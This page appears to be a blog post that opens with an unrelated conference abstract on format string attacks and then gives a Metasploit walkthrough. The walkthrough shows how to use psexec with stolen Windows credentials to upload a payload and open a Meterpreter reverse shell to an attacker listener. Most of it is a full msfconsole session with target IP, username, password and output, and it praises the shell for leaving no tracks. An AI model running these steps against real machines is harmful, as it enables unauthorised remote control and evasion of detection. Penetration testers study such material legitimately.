Format string attacks remain difficult in both software and hackademic exercises as the techniques have not improved since their discovery. This session demonstrates advanced format string attack techniques designed to automate the process from creation to compromise as well as incorporate those techniques into the Metasploit framework. The audience is encouraged to bring a basic understanding of format string attacks in order to leave the presentation with the tools necessary to never write one again.
The Meterpreter shell in Metasploit is a fantastic way to interact with a compromised box. It runs entirely in memory and leaves no trace of itself after you disconnect, allowing you to pillage and plunder cleanly without leaving any tracks.
I find myself using it fairly frequently against Windows machines that I’ve already gotten credentials for via some other means. In those cases it doesn’t make sense to use an actual exploit to get a Meterpreter shell going.
Use the psexec exploit (which actually isn’t an exploit, but whatever) to accomplish this:
msf > use exploit/windows/smb/psexec msf exploit(psexec) > set rhost 10.10.0.122 rhost => 10.10.0.122 msf exploit(psexec) > set smbpass Changem3 smbpass => Changem3 msf exploit(psexec) > set smbuser mark smbuser => mark msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 10.10.0.122 yes The target address RPORT 445 yes Set the SMB service port SMBDomain WORKGROUP no The Windows domain to use for authentication SMBPass Changem3 no The password for the specified username SMBUser mark no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 10.10.0.149 yes The listen address LPORT 4444 yes The listen port msf exploit(psexec) > exploit [*] Started reverse handler on 10.10.0.149:4444 [*] Connecting to the server... [*] Authenticating to 10.10.0.122:445|WORKGROUP as user 'mark'... [*] Uploading payload... [*] Created OUBfKBZr.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:10.10.0.122[sv cctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:[email protected]_np:10.10.0.122[svcc tl] ... [*] Obtaining a service manager handle... [*] Creating a new service (PWFeuNyE - "MthJLAgTDPzWvZXfaw")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Sending stage (749056 bytes) to 10.10.0.122 [*] Deleting OUBfKBZr.exe... [*] Meterpreter session 1 opened (10.10.0.149:4444 -> 10.10.0.122:1052) at 2011- 03-13 17:08:13 -0700 meterpreter > sysinfo Computer : EARTH OS : Windows XP (Build 2600, Service Pack 3). Arch : x86 Language : en_US Meterpreter: x86/win32
File and Print Sharing (445/tcp) needs to be enabled on the target host (duh) or this obviously won’t work.